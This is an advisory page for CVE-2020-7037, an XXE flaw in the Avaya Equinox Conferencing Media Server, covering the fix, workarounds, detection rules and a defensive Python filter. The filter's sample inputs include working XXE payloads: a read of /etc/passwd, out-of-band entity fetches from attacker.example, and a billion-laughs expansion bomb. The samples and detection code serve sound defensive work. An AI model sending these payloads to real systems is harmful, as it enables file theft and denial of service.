CVE-2020-7037
📋 TL;DR
An XML External Entities (XXE) vulnerability in the Media Server component of Avaya Equinox Conferencing allows authenticated remote attackers to read files from the affected system or cause a denial of service. All 9.x versions of Avaya Equinox Conferencing before 9.1.11 are affected, and any authenticated user can trigger the flaw. The product has since been rebranded as Avaya Meetings Server.
💻 Affected Systems
- Avaya Equinox Conferencing
- Avaya Meetings Server
📦 What is this software?
Avaya Equinox Conferencing (since rebranded Avaya Meetings Server) is Avaya's enterprise audio/video conferencing platform. The vulnerable component is its Media Server, which parses XML supplied by authenticated users.
⚠️ Risk & Real-World Impact
Worst Case
Attackers could read sensitive system files, configuration files, or credentials stored on the server, potentially leading to full system compromise or data exfiltration.
Likely Case
Attackers with valid credentials could read arbitrary files from the server filesystem, potentially accessing configuration files, logs, or other sensitive data.
If Mitigated
With network segmentation in place and credentials tightly controlled, only accounts that can both authenticate and reach the Media Server can exploit the flaw, which narrows exposure to insiders or attackers who have already obtained valid credentials. Note that the denial-of-service outcome remains available to any such account until the patch is applied.
🎯 Exploit Status
XXE is a well-understood vulnerability class with established exploitation techniques: file disclosure via SYSTEM entities, out-of-band exfiltration via parameter entities, and denial of service via entity expansion. Exploitation requires authenticated access to the vulnerable component, so obtaining credentials is the main barrier.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.1.11 or later
Vendor Advisory: https://support.avaya.com/css/P8/documents/101075574
Restart Required: Yes
Instructions:
1. Download Avaya Equinox Conferencing version 9.1.11 or later from the Avaya support portal.
2. Back up the current configuration.
3. Install the update following Avaya's upgrade procedures.
4. Restart the Media Server component.
🔧 Temporary Workarounds
Disable XML External Entity Processing
Configure the XML parser to disable external entity resolution (and DTD processing in general) if the application exposes such a setting. On a vendor appliance this is usually not tunable by the administrator, so treat it as a secondary measure and rely on the patch.
Network Segmentation
Restrict access to the Media Server component to trusted networks and users, for example with firewall rules or ACLs in front of it.
🧯 If You Can't Patch
- Implement strict network access controls to limit which users can reach the Media Server component
- Monitor server logs for XML parsing errors, unexpected file access, and outbound connections from the Media Server host to untrusted destinations (a sign of out-of-band XXE)
🔍 How to Verify
Check if Vulnerable:
Check the installed version of Avaya Equinox Conferencing/Meetings Server. If version is 9.x and less than 9.1.11, the system is vulnerable.
Check Version:
Check via Avaya Equinox Conferencing web interface or administrative console for version information.
Verify Fix Applied:
Verify the installed version is 9.1.11 or later. If you test the XML-handling functionality yourself, use a benign probe (an internal entity with a harmless value) and confirm it is not expanded in any response; do not send file-reading entities against production systems.
📡 Detection & Monitoring
Log Indicators:
- Unusual XML parsing errors
- File access attempts via XML parsing
- Unusually large XML payloads, or payloads with many nested entity declarations (the entity-expansion denial-of-service vector)
Network Indicators:
- XML requests containing DOCTYPE or ENTITY declarations, especially SYSTEM or PUBLIC references
- Outbound HTTP, FTP or DNS connections initiated by the Media Server host to untrusted destinations right after an XML request (out-of-band XXE)
SIEM Query:
source="avaya-media-server" AND (message="*XXE*" OR message="*external entity*" OR message="*DOCTYPE*" OR message="*<!ENTITY*")
This query only matches if the logged message field carries the request body or the parser's error text. If the Media Server logs neither, capture the XML at a reverse proxy or WAF in front of it and run the search there.
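Both the "Disable XML External Entity Processing" workaround and the detection indicators above come down to recognising the DOCTYPE and ENTITY constructs an XXE payload needs. The following Python is an added example written for this page, not code from Avaya or from the Media Server: it classifies an XML document's DTD prolog before any parser touches it (external entities, external DTD references, parameter entities, and the expansion size of internal entities, which is the denial-of-service vector) and provides a strict parse path that refuses any DTD. The sample payloads, the attacker.example hostname and the 10,000-byte expansion limit are constructed for the example.

```python
"""Triage filter for untrusted XML: flag the DOCTYPE/ENTITY patterns behind
XXE file reads, out-of-band fetches and entity-expansion DoS, plus a strict
parse path that refuses any DTD.  Added example; not Avaya's code."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!DOCTYPE root SYSTEM "uri"> or PUBLIC "id" "uri": the parser may fetch the DTD
EXTERNAL_DTD_RE = re.compile(r"<!DOCTYPE\s+[\w.\-:]+\s+(?:SYSTEM|PUBLIC)\s+", re.IGNORECASE)
# <!ENTITY [%] name (SYSTEM "uri" | PUBLIC "id" "uri" | "literal")>
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.\-:]+)\s+"
    r"(?:(?P<ext>SYSTEM|PUBLIC)\s+(?:[\"'][^\"']*[\"']\s+)?[\"'](?P<uri>[^\"']*)[\"']"
    r"|(?P<literal>\"[^\"]*\"|'[^']*'))",
    re.IGNORECASE,
)
ENTITY_REF_RE = re.compile(r"&([\w.\-:]+);")
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "apos": 1, "quot": 1}


@dataclass
class Verdict:
    has_doctype: bool = False
    external_dtd: bool = False
    external_entities: list = field(default_factory=list)   # (name, uri)
    parameter_entities: list = field(default_factory=list)  # names declared with %
    max_expansion: float = 0                                # bytes the largest entity expands to
    findings: list = field(default_factory=list)            # reasons to reject

    @property
    def reject(self) -> bool:
        return bool(self.findings)


def _expanded_len(name, literals, memo, visiting):
    """Expanded size of an internal entity; memoised so a billion-laughs
    payload is measured in O(declarations) rather than O(expansion)."""
    if name in PREDEFINED:
        return PREDEFINED[name]
    if name in memo:
        return memo[name]
    if name in visiting:                 # recursive entity: unbounded
        return float("inf")
    body = literals.get(name)
    if body is None:                     # undeclared or external: nothing to measure
        return 0
    visiting.add(name)
    total, pos = 0, 0
    for m in ENTITY_REF_RE.finditer(body):
        total += m.start() - pos + _expanded_len(m.group(1), literals, memo, visiting)
        pos = m.end()
    total += len(body) - pos
    visiting.discard(name)
    memo[name] = total
    return total


def classify(xml_text: str, expansion_limit: int = 10_000) -> Verdict:
    """Inspect the decoded document text before any XML parser sees it."""
    v = Verdict(has_doctype=bool(DOCTYPE_RE.search(xml_text)))
    if not v.has_doctype:
        return v
    if EXTERNAL_DTD_RE.search(xml_text):
        v.external_dtd = True
        v.findings.append("DOCTYPE references an external DTD")
    literals = {}
    for m in ENTITY_RE.finditer(xml_text):
        name = m.group("name")
        if m.group("param"):
            v.parameter_entities.append(name)
            v.findings.append(f"parameter entity %{name}; (blind/out-of-band XXE pattern)")
        if m.group("ext"):
            v.external_entities.append((name, m.group("uri")))
            v.findings.append(f"external entity {name} -> {m.group('uri')}")
        else:
            literals[name] = m.group("literal")[1:-1]
    memo, visiting = {}, set()
    for name in literals:
        v.max_expansion = max(v.max_expansion, _expanded_len(name, literals, memo, visiting))
    if v.max_expansion > expansion_limit:
        v.findings.append(f"entity expansion of {v.max_expansion} bytes exceeds {expansion_limit}")
    return v


def parse_untrusted(xml_text: str) -> ET.Element:
    """Strict path: refuse any DTD outright, so no entity is ever expanded."""
    if DOCTYPE_RE.search(xml_text):
        raise ValueError("DOCTYPE not allowed in untrusted XML")
    return ET.fromstring(xml_text)


def billion_laughs(levels: int = 4, fanout: int = 10) -> str:
    """Constructed entity-expansion payload: lol<levels> expands to 3 * fanout**levels bytes."""
    decls, prev = ['<!ENTITY lol "lol">'], "lol"
    for i in range(1, levels + 1):
        body = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{i} "{body}">')
        prev = f"lol{i}"
    return "<!DOCTYPE r [" + "".join(decls) + f"]><r>&{prev};</r>"


SAMPLES = {  # constructed inputs, not captured traffic
    "benign": '<?xml version="1.0"?><conference id="42"><name>weekly</name></conference>',
    "xxe_file": '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>',
    "xxe_oob": '<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://attacker.example/e.dtd"> %dtd;]><r/>',
    "ext_dtd": '<!DOCTYPE r SYSTEM "http://attacker.example/r.dtd"><r/>',
    "internal_only": '<!DOCTYPE r [<!ENTITY co "Example Corp">]><r>&co;</r>',
    "bomb": billion_laughs(),
}

if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        v = classify(doc)
        print(f"{label:14} reject={v.reject} findings={v.findings}")
```

Run it as a script to see the verdict for each sample. It inspects raw text, so decode the request body first (an attacker can hide the prolog in UTF-16); the regexes are a triage filter rather than a full DTD parser, which is why the strict path rejects DOCTYPE entirely instead of trying to enumerate every bad declaration.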